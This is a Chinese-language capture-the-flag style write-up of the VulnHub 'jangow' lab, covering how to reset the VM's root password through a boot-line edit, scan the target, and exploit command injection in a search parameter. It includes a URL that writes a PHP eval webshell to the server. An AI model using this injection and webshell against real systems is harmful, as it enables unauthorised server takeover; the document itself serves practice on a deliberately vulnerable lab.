vulnhub靶场-jangow-01-1.0.1(截止至获取shell)

安装靶机后我们发现我们扫描不到靶机的ip,所以我们需要修改靶机的配置文件

系统启动时,长按shift键,选择第二个选项,回车后再选择第二个选项

然后不要回车,按e,进入后向下翻 找到并删除删除"recovery nomodeset"并在最后添加"quiet splash rw init=/bin/bash",修改完成后按F10启动

ro/rw表示以只读(ro)/读写(rw)模式挂载根文件系统;

quiet用于设置静默模式;

splash用于设置启动时的屏幕输出;

init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。

输入passwd修改root账户的密码

修改完成后重启登录,账户名root 密码为刚才修改的密码

使用ipconfig -a 查看自己的网卡名

然后vim /etc/network/interfaces来修改自己的网卡信息

该文件是一个重要的网络配置文件,通常用于配置 Linux 系统中的网络接口和网络参数。它在 Debian 系统及其衍生版本(如 Ubuntu )中广泛使用,用于定义网络接口的配置信息,如IP地址、子网掩码、网关、DNS等。

将此处原先的网卡名称修改为自己的网卡名称

修改完成后按esc 然后 shift+/wq! 保存退出,然后重启靶机,这样kali就能扫描到我们的靶机IP了

扫描到了靶机IP,为192.168.171.129

扫描端口,只存在80端口以及21端口

扫描目录,只存在一个/site目录,访问,查看页面并没有什么功能点

点击Buscar,此时url可能有突破点

我们尝试whoami,成功执行,说明此处存在命令执行漏洞

我们尝试将一句话木马直接写入

http://192.168.171.129/site/busque.php?buscar=echo '<?php @eval($_POST"cmd")?>' > shell.php

//注意 写入该木马时,echo 后面要写入到指定文件的内容需要用单引号括起来,不可以使用双引号,$_POST里的使不使用单双引号括起来都行

写入成功,我们尝试访问shell.php并执行参数,则获取shell成功,后续使用蚁剑连接即可

相关推荐
ClouGence10 小时前
SQL Server CDC 能放到 Always On 备库读吗?一文讲透原理与实践
数据库·sql server
tntxia13 小时前
网络安全漏洞修复(一)
安全
orion571 天前
Missing Semester Class1:course overview and introduction of shell
linux
先吃饱再说1 天前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils1 天前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
用户120487221611 天前
Linux驱动编译与加载
linux·嵌入式
Databend1 天前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶1 天前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung1 天前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
parade岁月1 天前
MySQL JOIN解析:朴实无华但食之有味
数据库·后端